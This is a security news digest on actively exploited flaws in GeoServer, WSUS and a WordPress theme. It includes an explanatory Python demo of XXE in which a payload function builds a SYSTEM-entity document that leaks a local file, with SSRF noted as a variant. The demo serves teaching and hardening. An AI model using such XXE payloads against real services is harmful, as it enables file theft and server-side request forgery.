Exploitation
-
CISA orders immediate patching after active exploitation of critical GeoServer XXE flaw
CISA has ordered federal agencies to patch a critical unauthenticated XML External Entity (XXE) flaw in GeoServer (CVE-2025-58360) that is being actively exploited; researchers warn the bug can disclose files from the server and be used for SSRF, and public scans show thousands of exposed instances.
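Why an unauthenticated XXE turns into file disclosure and SSRF, as an added illustration of the mechanism (this is not GeoServer code and not the CVE-2025-58360 exploit): the Python stdlib xml.sax parser, once external general entities are enabled, resolves a SYSTEM entity and splices the referenced file into the document; with the feature left at its default (off) the reference expands to nothing. The "secret" file, its contents and the two parser configurations are constructed for the demo.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges


class TextCollector(xml.sax.ContentHandler):
    """Collects character data so we can see what the entity expanded to."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes, resolve_external_entities):
    """Parse xml_bytes and return the text found inside its elements.

    resolve_external_entities=True mimics a parser that has not been hardened
    (the XXE-prone configuration). False is the default of xml.sax on modern
    CPython: the parser still accepts the DOCTYPE, but the external entity
    reference expands to an empty string.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


def xxe_payload(target_path):
    """Classic XXE document: a SYSTEM entity pointing at a local file.

    With an http:// URL in place of the file path, xml.sax resolves the entity
    through urllib and the parser host makes the request itself; that is the
    SSRF variant of the same bug.
    """
    return (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE data [\n'
        b'  <!ENTITY xxe SYSTEM "' + target_path.encode() + b'">\n'
        b']>\n'
        b'<data>&xxe;</data>\n'
    )


def demo():
    """Write a constructed 'secret' file, then parse the payload both ways."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("TOP-SECRET-DEMO-VALUE")  # constructed sample content
        secret_path = fh.name
    try:
        payload = xxe_payload(secret_path)
        leaked = parse_text(payload, resolve_external_entities=True)
        safe = parse_text(payload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("external entities enabled :", repr(leaked))
    print("external entities disabled:", repr(safe))
```

The practical check this suggests for any XML-consuming service: confirm the parser has DTD processing or external entity resolution disabled, not merely that the application never "uses" entities, because the attacker supplies the DOCTYPE.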
-
Attackers exploit patched WSUS flaw to deploy infostealer on unpatched Windows servers
Attackers have been observed exploiting CVE-2025-59287 in Windows Server Update Services (WSUS) to deploy an infostealer on unpatched Windows servers, exfiltrating data to webhook.site URLs and using follow-up tooling that includes Velociraptor and a UPX-packed Skuld Stealer; agencies and vendors are urging immediate patching and investigation of exposed servers.
-
Attackers exploiting critical auth-bypass flaw in Service Finder WordPress theme
Security researchers at Wordfence say attackers are actively exploiting CVE-2025-5947, a critical authentication-bypass flaw in the Service Finder WordPress theme that can give attackers administrator access; a patch was released in version 6.1 and administrators are urged to update or stop using the theme.
-
CISA Identifies Four Critical Vulnerabilities Under Active Exploitation
CISA has flagged four critical vulnerabilities as under active exploitation and is urging organizations to apply the relevant updates immediately.
-
Exploitation of Vulnerabilities on the Rise: 159 CVEs Flagged in Q1 2025
A recent report counts 159 CVEs flagged as exploited in the wild in Q1 2025, continuing the upward trend in vulnerability exploitation; organizations should prioritize patching the flaws with confirmed exploitation over those with only a high severity score.